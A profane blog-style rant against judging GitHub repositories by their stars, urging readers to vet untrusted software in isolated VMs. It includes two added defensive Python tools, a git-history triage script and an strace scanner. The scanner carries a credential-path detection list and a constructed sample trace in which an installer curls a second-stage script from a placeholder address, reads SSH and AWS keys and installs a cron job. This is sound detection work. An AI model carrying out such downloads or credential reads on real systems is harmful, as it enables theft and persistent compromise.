For fuck’s sake, STOP with the GitHub stars madness.
Everywhere, every day, everyone: YouTube, blogs, news outlets, … it has become the only metric used to assess whether a repository is interesting, important, useful, inspiring, or whatever.
“This repo got [meaningless number] stars in 2 days, it’s genius!”
“This repo now has [meaningless number] stars, you MUST use it!”
What is wrong with you all?
Have all these years of fake online reviews not taught you anything?
Since when has the popularity of anything told you how good that thing actually was?
By the way, have you looked at the star counts of barely known repositories like:
- Firefox [https://github.com/mozilla-firefox/firefox]
- VLC [https://github.com/videolan/vlc]
- Notepad++ [https://github.com/notepad-plus-plus/notepad-plus-plus]
- Wazuh [https://github.com/wazuh/wazuh]
The number of stars does not tell you anything useful.
You don’t know if:
- it is used at all
- it is useful
- it is of decent quality
- it is safe
Don’t you all remember Iceland ran out of cucumbers because of a TikTok video? Or the global pistachio shortage thanks to Dubai chocolate?
Learn to make up your own mind about things. Read the README file. Look at the issues tab. Look at the pull requests tab. Look at the commit history. Look at the insights. Look at the code base.
Are you really going to run 2-day-old software vibe-coded by a random anonymous bloke? At work? At home, on the computer that holds your private data?
Think about the consequences.
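Here is what “look at the commit history” can look like in practice, as an added example (mine, not the post’s, and not tied to any real project). It parses a `git log` capture of a freshly cloned repository and flags exactly the things a star count hides: how old the history really is, whether one account wrote everything, and whether the code arrived as a single giant dump rather than being developed in the open. The `git log` format string, the thresholds and the sample history are all assumptions of this example; the sample log is constructed.

```python
"""Triage a repository by its commit history rather than its star count.

This is an added example, not code from the original post. It assumes you
cloned the repo and captured

    git log --reverse --shortstat --format='%H|%an|%aI|%s' > log.txt

The field separator, the thresholds and the sample below are this example's
own choices; the sample log is constructed, not taken from any real project.
"""
import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta

COMMIT_RE = re.compile(r"^([0-9a-f]{7,40})\|([^|]*)\|([^|\s]+)\|(.*)$")
STAT_RE = re.compile(
    r"^\s*(\d+) files? changed"
    r"(?:, (\d+) insertions?\(\+\))?"
    r"(?:, (\d+) deletions?\(-\))?\s*$"
)


@dataclass
class Commit:
    sha: str
    author: str
    when: datetime
    subject: str
    added: int = 0
    deleted: int = 0


def parse_git_log(text: str) -> list[Commit]:
    """Parse the command's output. git prints the --format line, optionally a
    blank line, then the shortstat line; merge and empty commits have no stat
    line at all, so a stat line is attached to the most recent commit seen."""
    commits: list[Commit] = []
    for line in text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            sha, author, when, subject = m.groups()
            commits.append(Commit(sha, author, datetime.fromisoformat(when), subject))
            continue
        s = STAT_RE.match(line)
        if s and commits:
            commits[-1].added = int(s.group(2) or 0)
            commits[-1].deleted = int(s.group(3) or 0)
    return sorted(commits, key=lambda c: c.when)


def triage(commits: list[Commit], *, min_history_days: float = 30,
           dump_lines: int = 5000, dominance: float = 0.9) -> dict:
    """Reduce the history to the things the post tells you to look at: how long
    the project has actually existed, how many people work on it, and whether
    the code was dumped in one commit instead of developed in the open."""
    if not commits:
        raise ValueError("no commits parsed")
    history_days = (commits[-1].when - commits[0].when) / timedelta(days=1)
    by_author = Counter(c.author for c in commits)
    top_author, top_count = by_author.most_common(1)[0]
    top_share = top_count / len(commits)
    dumps = [c for c in commits if c.added >= dump_lines]

    flags = []
    if history_days < min_history_days:
        flags.append(f"history spans only {history_days:.1f} days")
    if len(by_author) == 1:
        flags.append(f"single author ({top_author})")
    elif top_share >= dominance:
        flags.append(f"{top_author} wrote {top_share:.0%} of all commits")
    for c in dumps:
        flags.append(f"{c.sha[:7]} adds {c.added} lines at once ({c.subject!r})")
    return {
        "commits": len(commits),
        "history_days": round(history_days, 1),
        "authors": len(by_author),
        "top_author_share": round(top_share, 2),
        "code_dumps": len(dumps),
        "flags": flags,
    }


# Constructed sample: a 2-day-old repo with one author and one 48k-line dump.
SAMPLE_LOG = """\
a1b2c3d4e5f6|anon|2025-06-01T10:00:00+02:00|initial commit

 212 files changed, 48311 insertions(+)
b2c3d4e5f6a7|anon|2025-06-01T18:30:00+02:00|fix build

 3 files changed, 12 insertions(+), 4 deletions(-)
c3d4e5f6a7b8|anon|2025-06-02T09:15:00+02:00|add README badges

 1 file changed, 9 insertions(+), 1 deletion(-)
d4e5f6a7b8c9|anon|2025-06-02T21:05:00+02:00|Merge pull request #1 from anon/fix
e5f6a7b8c9d0|anon|2025-06-03T08:40:00+02:00|typo

 1 file changed, 1 insertion(+), 1 deletion(-)
"""

if __name__ == "__main__":
    for flag in triage(parse_git_log(SAMPLE_LOG))["flags"]:
        print("!", flag)
```

Run it against a real clone by feeding `log.txt` to `parse_git_log`. The thresholds are deliberately crude; the point is that these signals cost nothing to check and are harder to fake than a star count. One caveat: git author dates are whatever the committer sets them to, so a long-looking history can be forged. Cross-check the first commit date against the repository’s creation date on the hosting platform and against the dates of the earliest issues and releases, which the author does not control.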
The Internet is filled with people who want your money, by whatever means. It’s already risky that we all depend on foundational, global software like xz, Debian Linux, trivy, etc. It’s already bad when those get compromised, but here you are handing the keys to your home to bad people. Willingly.
If you want to run untrusted software, do it responsibly. Run it in a virtual machine, on a network isolated from your home network(s). Take a clean snapshot before you start and revert to it afterwards. Have an EDR such as Wazuh inside the virtual machine. Check your logs for unusual and malicious patterns.
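As an added example of the “check your logs” step (my code, not the post’s and not Wazuh’s): one cheap way to get a behaviour log out of the throwaway VM is to run the untrusted command under `strace` and scan the trace afterwards. The three rules below are this example’s own choices, and the sample trace is constructed (203.0.113.7 is a documentation address, not a real host).

```python
"""Scan a behaviour trace of untrusted software run inside an isolated VM.

Added example, not code from the original post or from Wazuh. It assumes you
ran the software in the throwaway VM under

    strace -f -e trace=execve,connect,openat -o trace.log <command>

and it applies this example's own three rules of thumb: any non-loopback
connection attempt (in a network-isolated VM there is no legitimate one),
reads of credential stores, and downloader or persistence commands. The
sample trace is constructed; 203.0.113.7 is a documentation-range address.
"""
import ipaddress
import re

LINE_RE = re.compile(r"^(?:(?P<pid>\d+)\s+)?(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>.*)$")
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
INET_RE = re.compile(r'inet_addr\("([^"]+)"\)|inet_pton\(AF_INET6, "([^"]+)"')
URL_RE = re.compile(r"^https?://", re.I)

# Paths no build script or CLI tool has any business reading (example's own list).
CREDENTIAL_PATHS = ("/.ssh/", "/.aws/", "/.gnupg/", "/.kube/", "/.docker/config.json",
                    "/.netrc", "/etc/shadow", "/.mozilla/firefox/", "/.config/google-chrome/")
DOWNLOADERS = {"curl", "wget"}


def parse_argv(args: str) -> list[str]:
    """Extract execve's argv array; strace truncates long arrays with '...'."""
    start = args.find("[")
    end = args.find("]", start)
    if start < 0 or end < 0:
        return []
    return QUOTED_RE.findall(args[start:end])


def scan_strace(text: str) -> list[dict]:
    """Return one finding per suspicious syscall, in trace order."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # '+++ exited +++', '<unfinished ...>' and signal lines
        pid, call, args, ret = m.group("pid", "call", "args", "ret")
        if call == "execve":
            argv = parse_argv(args)
            prog = argv[0].rsplit("/", 1)[-1] if argv else ""
            if prog in DOWNLOADERS and any(URL_RE.match(a) for a in argv[1:]):
                findings.append({"pid": pid, "kind": "downloader", "detail": " ".join(argv)})
            if prog == "crontab" or (prog == "systemctl" and "enable" in argv):
                findings.append({"pid": pid, "kind": "persistence", "detail": " ".join(argv)})
        elif call == "connect":
            ip_m = INET_RE.search(args)
            if ip_m:  # AF_UNIX sockets carry no address and are ignored
                ip = ipaddress.ip_address(ip_m.group(1) or ip_m.group(2))
                if not ip.is_loopback:
                    findings.append({"pid": pid, "kind": "outbound-connect",
                                     "detail": f"{ip} -> {ret}"})
        elif call in ("open", "openat"):
            path_m = QUOTED_RE.search(args)  # first quoted argument is the path
            if path_m and any(p in path_m.group(1) for p in CREDENTIAL_PATHS):
                findings.append({"pid": pid, "kind": "credential-read",
                                 "detail": path_m.group(1)})
    return findings


# Constructed trace: a "setup.py install" that fetches a second stage, reads
# the user's SSH and AWS credentials, and tries to install a cron job.
SAMPLE_TRACE = """\
4242 execve("/usr/bin/python3", ["python3", "setup.py", "install"], 0x7ffc1a2b3c40 /* 22 vars */) = 0
4243 execve("/usr/bin/curl", ["curl", "-fsSL", "http://203.0.113.7/stage2.sh"], 0x55d0c0ffee00 /* 22 vars */) = 0
4243 connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("203.0.113.7")}, 16) = -1 ENETUNREACH (Network is unreachable)
4242 openat(AT_FDCWD, "/home/user/.ssh/id_ed25519", O_RDONLY|O_CLOEXEC) = 5
4242 openat(AT_FDCWD, "/home/user/.aws/credentials", O_RDONLY|O_CLOEXEC) = 6
4242 openat(AT_FDCWD, "/usr/lib/python3.12/os.py", O_RDONLY|O_CLOEXEC) = 3
4244 execve("/usr/bin/crontab", ["crontab", "-"], 0x55d0c0ffee00 /* 22 vars */) = 0
4242 connect(7, {sa_family=AF_UNIX, sun_path="/run/user/1000/bus"}, 110) = 0
4242 connect(8, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("127.0.0.53")}, 16) = 0
4243 +++ exited with 7 +++
"""

if __name__ == "__main__":
    for f in scan_strace(SAMPLE_TRACE):
        print(f"[{f['kind']}] pid {f['pid']}: {f['detail']}")
```

Because the VM has no route out, the `connect` shows up as ENETUNREACH: the isolation blocked the call-home, and the failed attempt is itself the evidence. `strace` is not a replacement for the EDR agent: it sees only the traced process tree, it can be detected by the program (ptrace), and it misses anything the kernel does on the program’s behalf. Treat it as a second, independent view to put next to the agent’s alerts.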
You want to help open-source software? Use it, for longer than the five minutes it takes to shoot a YouTube video. Compare it to existing similar software, write a review about it, contact the author(s) to let them know about your findings. Report bugs in a useful manner. Better yet, fix the damn bugs. Use your 200-dollar-a-month subscription to do some useful work. Review the fix, test it yourself, make sure it actually works. Only once it works, submit a pull request.
Finally, if the software has actually brought you something positive, then, and only then, perhaps click that star button. But even that only feeds useless statistics pipelines and gives zero useful feedback to anyone.
Random sources over the years:
- [https://www.wired.com/story/fake-amazon-reviews-underground-market/]
- [https://www.nytimes.com/wirecutter/blog/lets-talk-about-amazon-reviews/]
- [https://www.legavox.fr/blog/maitre-anthony-bem/reputation-rapport-dgccrf-faux-avis-15824.htm]
- [https://daily.dev/blog/xz-backdoor-the-full-story-in-one-place/]
- [https://unit42.paloaltonetworks.com/axios-supply-chain-attack/]